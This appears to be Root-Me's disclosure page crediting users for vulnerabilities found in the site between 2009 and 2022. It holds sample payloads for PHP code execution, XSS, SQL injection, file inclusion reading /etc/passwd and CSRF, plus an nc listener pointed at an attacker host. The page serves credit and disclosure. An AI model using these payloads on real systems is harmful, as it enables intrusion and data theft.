Discovered Weaknesses

与任何信息系统一样，在网站上也发现了一些不足之处。

27/08/2022 Laluka

identifying a vulnerability or a bump of a content of the site to a "higher" status, (draft to evaluation, or trash to writing) triggers the sending of an email to the author or the administrator. Some variables (title, content, ...) were not properly escaped and passed to the eval function before sending the email, allowing code execution.

send(eval($email));

21/07/2022 Abyss Watcher & SpawnZii

have identified a remote code execution (RCE) vulnerability allowing a privileged user to execute PHP code:

https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG 9DIjt9'"><?php system('id;hostname;whoami');?>

11/07/2022 Abyss Watcher

identified a stored XSS vulnerability exploitable with an iframe hosted on RM domain :

<iframe src="https://www.root-me.org/IMG/html/xss.html">

17/03/2022 Mizu

identified a stored XSS vulnerability exploitable with an iframe hosted on a malicious domain starting with www.root-me.org :

<iframe src="https://www.root-me.org.evil.domain/">

23/11/2021 zLade

identified a vulnerability allowing a member of the association to elevate his role to administrator simply by using the private interface of SPIP.

01/10/2021 Podalirius

identified a vulnerability allowing access to documents attached to solutions without restrictions :

<imgXX>

15/05/2020 Laluka

identified multiples vulnerabilities : 3 reflected XSS, 2 SQLi and 1 RCE :

https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=

https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E

https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>

https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--

/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-

https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E

12/01/2020 NonStandardModel

identified an XSS vulnerability in the name of the file imported on http://repository.root-me.org/

04/06/2019 x code

identified an XSS vulnerability. This one required a user intervention on the chatbox (a click on the previous page).

http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>

04/06/2019 x code

has identified a vulnerability allowing to kill, with an unprivileged user, the database available on the challenge01 server which hosts several challenges, by saturating the memory in a particular way in order to kill the process of his choice. This allowed to restart another binary instead listening on the same port via a race condition.

16/11/2018 Shrewk

identified a vulnerability allowing to trap the users of the store through an iframe via a spreadshirt domain controlled by the attacker (e.g. spreadshirt.ro), the lang parameter was not filtered correctly.

12/04/2018 DrStache & urandom

identified a stored XSS vulnerability in the OSM map in the CTFATD rooms by injecting the following payload into the user’s bio (https://www.root-me.org/?page=preferences&lang=en)

<svg onload=console.log(document.domain)>

12/10/2015 ST4HLKR1EG

has identified an "Insecure Direct Object Reference" vulnerability allowing to read any private message :

page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[message_ID]

03/2015 WtF

has identified a remote code execution (RCE) vulnerability in a challenge being evaluated on the production server, allowing it to access the file system with ssh and to execute commands.

03/2015 WtF

has identified an arbitrary file inclusion vulnerability (LFI) in the Path Truncation web-server challenge that allows it to read files from other challenges.

15/06/2013 LouTerrailloune

has identified a PHP code injection vulnerability on the "code - decode" page:

Text to decode in base64 :

PD9waHAgcGhwaW5mbygpOyA/Pg==

06/11/2012 jimee

found several stored XSS in the user profile management :

<script>[code javascript/vbscript]</script>

20/03/2012 jimee

found a LFI in a challenge :

http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php

23/10/2011 courte66

found a reflected XSS in the "encode - decode" page :

Text to decode in base64

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

02/10/2011 Hypnoze

found a insecure indirect object references which lead to unauthorized access to all PM :

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]

11/07/2011 Armel

found a stored XSS on the chatbox.

<iframe src="javascript:[code javascript]' />

18/07/2011 g0uZ

found a PHP code injection vulnerability on the "online tools : nmap"

Host to scan in -sV mode :

--version-trace -p8888 [IP server attacker]

Service listening on attacker server

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

30/06/2011 elyfean

found a CSRF on the chatbox :

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">

<input type=hidden name="ON" value="1">

<input type=hidden name="message" value="0wn3d !">

</form>

15/02/2011 EsSandre

found a LFI :

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

02/02/2011 hello

found several stored XSS in the PM system :

<script>[code javascript/vbscript]</script>

02/12/2009 real

found a code injection vulnerability :

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'